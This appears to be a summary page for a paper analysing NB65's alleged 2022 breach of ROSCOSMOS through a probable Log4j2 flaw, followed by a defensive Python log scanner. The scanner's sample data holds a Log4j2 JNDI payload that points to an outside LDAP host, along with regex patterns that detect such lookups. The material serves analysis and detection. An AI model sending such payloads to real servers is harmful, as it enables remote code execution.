Hacktivism Goes Orbital: Investigating NB65's Breach of ROSCOSMOS

Rajiv Thummala, Gregory Falco
DOI: https://doi.org/10.2514/6.2024-0268
2024-02-16
Abstract: In March of 2022, Network battalion 65 (NB65), a hacktivist affiliate of Anonymous, publicly asserted its successful breach of ROSCOSMOS's satellite imaging capabilities in response to Russia's invasion of Ukraine. NB65 disseminated a series of primary sources as substantiation, proclaiming the incapacitation of ROSCOSMOS's space-based vehicle monitoring system and doxing of related proprietary documentation. Despite the profound implications of hacktivist incursions into the space sector, the event has garnered limited attention due to the obscurity of technical attack vectors and ROSCOSMOS's denial of NB65's allegations. Through analysis of NB65's released primary sources of evidence, this paper uncovers the probable vulnerabilities and exploits that enabled the alleged breach into ROSCOSMOS's ground and space segment. Additionally, we highlight lessons learned and the consequences this event has for the global aerospace community.
Cryptography and Security, Systems and Control
What problem does this paper attempt to address?
### Problems the paper attempts to solve

This paper aims to analyze and reveal the technical details of the event in which the hacker group Network Battalion 65 (NB65) claimed to have successfully hacked into the satellite imaging capabilities of the Russian State Space Corporation (ROSCOSMOS) on March 1, 2022. Specifically, the paper attempts to solve the following problems:

1. **Technical vulnerability analysis**: By analyzing the screenshots released by NB65 and other public evidence, identify possible vulnerabilities in the ground and space segments of ROSCOSMOS and the specific methods the attackers used to exploit them.
2. **Attack process reconstruction**: Construct an estimated Cyber Kill Chain detailing how NB65 gradually infiltrated and controlled the ROSCOSMOS system, including the reconnaissance, weaponization, delivery, detonation, and malware installation stages.
3. **Impact assessment**: Evaluate the impact of this attack on ROSCOSMOS and its related systems (such as the vehicle monitoring system), and discuss the significance and lessons of this event for the global aerospace community.
4. **Enhancement of security awareness**: Through this case study, raise awareness of cyber-security threats in the space domain and, in particular, recommend security protection measures for critical infrastructure.

### Summary of specific content

- **Background introduction**: The paper first introduces the concept of hacktivism and its development in the modern network environment, especially in the context of the Russia-Ukraine conflict, in which hacker groups such as NB65 have carried out a series of cyber-attacks on Russian institutions.
- **Event overview**: On March 1, 2022, NB65 claimed to have successfully hacked into the satellite imaging capabilities and vehicle monitoring systems of ROSCOSMOS and released multiple screenshots as evidence. However, because detailed attack vectors and technical details were lacking, media and security bulletins gave this event limited coverage.
- **Technical analysis**:
  - **WSO2 platform**: NB65 deleted the WSO2 platform, which may leave the satellite system unable to manage functions such as APIs, authentication, and access control.
  - **Credential rotation**: NB65 changed the access credentials of the VMS, making it harder for ROSCOSMOS to regain control.
  - **Server shutdown**: NB65 shut down the server, interrupting data processing and services.
  - **Log4j2 RCE vulnerability**: The paper points out that the version of WSO2 Enterprise Integrator used by ROSCOSMOS has a Log4j2 RCE vulnerability, which is a key attack point NB65 may have exploited.
- **Cyber Kill Chain example**:
  - **Reconnaissance**: NB65 obtained network information about ROSCOSMOS through open-source intelligence (OSINT).
  - **Weaponization**: Developed attack payloads exploiting the Log4j2 RCE vulnerability.
  - **Delivery**: Injected malicious code through the Log4j2 logging system.
  - **Detonation**: Executed remote code to delete WSO2, rotate credentials, and shut down the server.
  - **Installation**: Installed malware to maintain persistent access.

### Conclusions and significance

This paper not only fills the gap in the technical details of this event in the media and security bulletins but also provides valuable insights into the potential threats of hacktivism to the space domain. Through in-depth analysis of this event, researchers can better develop response strategies to protect critical infrastructure from similar cyber-attacks.
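As an added illustration (not from the paper, and not ROSCOSMOS or WSO2 code) of what the "Delivery" step in the kill chain above looks like from the defender's side: a small Python scanner that flags Log4j2 lookup sequences in web-server log lines, treating a `jndi:` lookup as high severity and any other `${...}` lookup in an attacker-controllable field as medium. The log lines, addresses and paths are constructed for this example.

```python
import re
from dataclasses import dataclass

# Any Log4j2 lookup sequence "${...}" arriving in an attacker-controllable
# field (here the User-Agent) is abnormal and worth an alert on its own.
LOOKUP_RE = re.compile(r"\$\{[^}]*\}")
# The jndi: lookup prefix is the one that triggers remote class loading,
# so it gets the higher severity.
JNDI_RE = re.compile(r"\$\{[^}]*jndi\s*:", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    severity: str   # "high" for a jndi lookup, "medium" for any other lookup
    excerpt: str    # the matched lookup text, for the analyst


# Constructed sample log lines in common web-server format (not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Mar/2022:10:12:01 +0000] "GET /services/status HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Mar/2022:10:12:05 +0000] "GET /services/status HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5/x}"',
    '198.51.100.9 - - [01/Mar/2022:10:12:09 +0000] "GET /services/status HTTP/1.1" 200 512 "-" "${env:JAVA_HOME}"',
    '198.51.100.4 - - [01/Mar/2022:10:13:00 +0000] "GET /services/status HTTP/1.1" 200 512 "-" "curl/7.68.0"',
]


def scan_log(lines):
    """Return one Finding per line that carries a Log4j2 lookup sequence."""
    findings = []
    for n, line in enumerate(lines, start=1):
        m = JNDI_RE.search(line)
        if m:
            findings.append(Finding(n, "high", m.group(0)))
            continue
        m = LOOKUP_RE.search(line)
        if m:
            findings.append(Finding(n, "medium", m.group(0)))
    return findings


def summarize(findings):
    """Count findings per severity so a dashboard can trend them over time."""
    counts = {"high": 0, "medium": 0}
    for f in findings:
        counts[f.severity] += 1
    return counts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.severity.upper()} lookup {f.excerpt!r}")
    print(summarize(scan_log(SAMPLE_LOG)))
```

A medium finding is still worth triage: lookups never belong in client-supplied fields, and the paper's point is that a logging path, not an obviously exposed service, was the entry point.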